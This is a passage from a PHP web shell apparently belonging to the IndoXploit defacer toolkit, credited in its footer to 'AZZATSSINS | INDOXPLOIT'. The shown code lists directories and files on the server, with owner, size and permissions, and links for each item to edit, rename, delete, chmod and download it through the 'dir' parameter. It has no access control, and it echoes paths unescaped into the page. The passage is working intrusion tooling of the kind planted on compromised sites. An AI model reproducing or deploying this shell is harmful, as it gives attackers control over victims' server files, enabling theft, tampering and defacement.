1794.     if($delete) {
1795.         $act = "<script>window.location='?dir=".$dir."';</script>";
1796.     } else {
1797.         $act = "<font color=red>permission denied</font>";
1798.     }
1799.     echo $act;
1800. } else {
1801.     if(is_dir($dir) === true) {
1802.         if(!is_readable($dir)) {
1803.             echo "<font color=red>can't open directory. ( not readable )</font>";
1804.         } else {
1805.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
1806.             <tr>
1807.             <th class="th_home"><center>Name</center></th>
1808.             <th class="th_home"><center>Type</center></th>
1809.             <th class="th_home"><center>Size</center></th>
1810.             <th class="th_home"><center>Last Modified</center></th>
1811.             <th class="th_home"><center>Owner/Group</center></th>
1812.             <th class="th_home"><center>Permission</center></th>
1813.             <th class="th_home"><center>Action</center></th>
1814.             </tr>';
1815.             $scandir = scandir($dir);
1816.             foreach($scandir as $dirx) {
1817.                 $dtype = filetype("$dir/$dirx");
1818.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
1819.                 if(function_exists('posix_getpwuid')) {
1820.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
1821.                     $downer = $downer['name'];
1822.                 } else {
1823.                     //$downer = $uid;
1824.                     $downer = fileowner("$dir/$dirx");
1825.                 }
1826.                 if(function_exists('posix_getgrgid')) {
1827.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
1828.                     $dgrp = $dgrp['name'];
1829.                 } else {
1830.                     $dgrp = filegroup("$dir/$dirx");
1831.                 }
1832.                 if(!is_dir("$dir/$dirx")) continue;
1833.                 if($dirx === '..') {
1834.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
1835.                 } elseif($dirx === '.') {
1836.                     $href = "<a href='?dir=$dir'>$dirx</a>";
1837.                 } else {
1838.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
1839.                 }
1840.                 if($dirx === '.' || $dirx === '..') {
1841.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
1842.                     } else {
1843.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a> | <a href='?act=chmod_dir&dir=$dir/$dirx'>chmod</a>";
1844.                 }
1845.                 echo "<tr>";
1846.                 echo "<td class='td_home'>$href</td>";
1847.                 echo "<td class='td_home'><center>$dtype</center></td>";
1848.                 echo "<td class='td_home'><center>-</center></th></td>";
1849.                 echo "<td class='td_home'><center>$dtime</center></td>";
1850.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
1851.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
1852.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
1853.                 echo "</tr>";
1854.             }
1855.         }
1856.     } else {
1857.         echo "<font color=red>can't open directory.</font>";
1858.     }
1859.         foreach($scandir as $file) {
1860.             $ftype = filetype("$dir/$file");
1861.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
1862.             $size = filesize("$dir/$file")/1024;
1863.             $size = round($size,3);
1864.             if(function_exists('posix_getpwuid')) {
1865.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
1866.                 $fowner = $fowner['name'];
1867.             } else {
1868.                 //$downer = $uid;
1869.                 $fowner = fileowner("$dir/$file");
1870.             }
1871.             if(function_exists('posix_getgrgid')) {
1872.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
1873.                 $fgrp = $fgrp['name'];
1874.             } else {
1875.                 $fgrp = filegroup("$dir/$file");
1876.             }
1877.             if($size > 1024) {
1878.                 $size = round($size/1024,2). 'MB';
1879.             } else {
1880.                 $size = $size. 'KB';
1881.             }
1882.             if(!is_file("$dir/$file")) continue;
1883.             echo "<tr>";
1884.             echo "<td class='td_home'><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
1885.             echo "<td class='td_home'><center>$ftype</center></td>";
1886.             echo "<td class='td_home'><center>$size</center></td>";
1887.             echo "<td class='td_home'><center>$ftime</center></td>";
1888.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
1889.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
1890.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=chmod&dir=$dir&file=$dir/$file'>chmod</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
1891.             echo "</tr>";
1892.         }
1893.         echo "</table>";
1894.         if(!is_readable($dir)) {
1895.             //
1896.         } else {
1897.             echo "<hr>";
1898.         }
1899. }
1900.     echo "<center><br><br><b><i><fieldset><font color=lime size=-20><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>AZZATSSINS | INDOXPLOIT</a></font></fieldset></i></b></center>";
1901. ?>